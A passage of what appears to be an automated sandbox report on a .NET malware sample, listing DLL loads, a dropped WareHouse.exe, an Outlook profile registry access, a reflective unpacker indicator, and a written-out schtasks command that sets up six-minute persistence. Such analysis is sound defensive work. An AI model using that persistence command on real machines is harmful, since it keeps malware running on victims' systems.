                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: edputil.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sxs.dll
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Mu7iyblZk8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: Mu7iyblZk8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Mu7iyblZk8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdb source: Mu7iyblZk8.exe, WareHouse.exe.0.dr
                  Source: Binary string: C:\Users\User\Desktop\Outputs\Omboxaav.pdbP source: Mu7iyblZk8.exe, WareHouse.exe.0.dr

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: Mu7iyblZk8.exe, PreventFromWeb.cs.Net Code: FOBDesusertion System.Reflection.Assembly.Load(byte[])
                  Source: WareHouse.exe.0.dr, PreventFromWeb.cs.Net Code: FOBDesusertion System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeCode function: 0_2_00007FF886E18167 push ebx; ret 0_2_00007FF886E1816A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261F109 push eax; mov dword ptr [esp], ecx3_2_0261F11C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261F448 push eax; mov dword ptr [esp], ecx3_2_0261F45C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261D4A8 push eax; mov dword ptr [esp], ecx3_2_0261D4BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0261D581 push eax; mov dword ptr [esp], ecx3_2_0261D594
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeCode function: 10_2_00007FF886E28167 push ebx; ret 10_2_00007FF886E2816A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128C8CA push eax; ret 11_2_0128C8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128C8D2 push eax; mov dword ptr [esp], ecx11_2_0128C8DC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128E5F8 push eax; mov dword ptr [esp], ecx11_2_0128E60C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0128E78A push eax; mov dword ptr [esp], ecx11_2_0128E79C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05DEB081 push 4005E06Ah; ret 11_2_05DEB08D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_05E13E98 push eax; ret 11_2_05E13E9D
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeFile created: C:\Users\user\AppData\Roaming\WareHouse.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WareHouse" /tr "C:\Users\user\AppData\Roaming\WareHouse.exe " /sc minute /mo 6 /f
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Mu7iyblZk8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\WareHouse.exeProcess information set: NOOPENFILEERRORBOX
